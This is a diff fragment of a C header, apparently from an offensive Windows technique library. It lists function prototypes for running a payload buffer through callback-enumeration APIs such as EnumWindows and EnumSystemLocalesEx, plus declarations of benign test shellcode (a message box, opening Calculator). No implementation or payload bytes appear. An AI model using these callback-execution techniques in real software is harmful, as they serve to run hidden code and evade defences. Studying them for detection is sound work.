BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -454,6 +368,6 @@ INT __demonstration_WinMain(VOID); //hook sleep
|
|||
/*******************************************
|
||||
GENERIC SHELLCODE PAYLOADS FOR TESTINGS
|
||||
*******************************************/
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(VOID);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
|
|
Loading…
Reference in New Issue